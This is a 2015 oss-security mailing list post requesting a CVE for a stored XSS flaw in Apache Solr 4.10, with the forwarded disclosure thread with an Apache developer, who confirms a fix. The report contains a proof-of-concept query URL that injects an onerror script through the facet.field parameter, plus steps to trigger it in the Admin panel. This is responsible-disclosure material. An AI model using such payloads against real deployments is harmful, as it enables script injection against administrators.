|
Message-ID: <CACd+vpeiS5ukjowuWVtNPZUGO+J-V=YCStT7NO679jYx=p+jJg@mail.gmail.com> Date: Sun, 15 Mar 2015 14:30:44 +0530 From: Puneeth Gowda <puneethis021@...il.com> To: oss-security@...ts.openwall.com Subject: CVE Request - Apache Solr 4.10 Hi, Please assign a CVE for this issue : Software : Apache Solr Version : 4.10 Thanks Puneeth FYI, ---------- Forwarded message ---------- From: Puneeth Gowda <puneethis021@...il.com> Date: Tue, Nov 18, 2014 at 8:30 AM Subject: Re: Security Vulnerability in Solr v4.10 To: Stefan Matheis <steffkes@...che.org> Hello Stefan, Patch is working fine.. Issue has been fixed now. Thanks Puneeth On Fri, Nov 14, 2014 at 1:51 AM, Stefan Matheis <steffkes@...che.org> wrote: > Hi Puneeth > > I'm really sorry about the late reply - this is my first CVE i'm handling, > so i'm trying to do it properly and wanted to ensure that everything is > working according to plans & ASF agenda. > > The CVE you've asked about is CSV-2014-3628, the fix i was working on > already is committed to trunk, you can have a look at the applied changes > at https://issues.apache.org/jira/browse/SOLR-6738 . I'd be happy to know > if that covers all the cases you've discovered or if there are more that > i've missed with this fix! > > -Stefan > > On Sunday, November 2, 2014 at 8:38 AM, Puneeth Gowda wrote: > > Hi Stefan, > > Thank you for your response. > > I'd really appreciate if you could assign a CVE to this bug. ! > > Thanks > puneeth > > On Sun, Nov 2, 2014 at 4:52 AM, Stefan Matheis <steffkes@...che.org> > wrote: > > Hi Puneeth > > Sorry for the late response, thanks for reporting this vulnerability - i'm > hereby acknowledging it on behalf of the Lucene PMC. > > We have investigated your report and accept it. I'm already working on a > fix. > > -Stefan > > -------- Original Message -------- > Subject: Security Vulnerability in Solr v4.10 > Date: Wed, 29 Oct 2014 16:57:06 +0530 > From: Puneeth Gowda <puneethis021@...il.com> > To: security@...che.org > > > > Hi, > > I would like to report a stored xss vulnerability in solr web app > version : 4.10 > > ################################################### > Vulnerability Name : Stored XSS > Software : Apache Solr > Version : 4.10 > ################################################### > > POC: > > > Steps: > 1)Search with following query : > fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a > > onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20& > json.nl > <http://json.nl > >=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json > > Final URL : > http://localhost:8080/solr/ > <app>/select?fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img > src=a > > onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20& > json.nl > <http://json.nl > >=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json > > 2) Now browse to Solr Admin panel > URL: http://localhost:8080/solr/ > Click on Plugins/stats after selecting <core> from the drop down. > Browser displays popup. > > Reason : The parameter "fieldvalucache" stores all searched queries > without sanitizing, which results in execution of javascript. > > > Thanks > Puneeth > > > > >
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.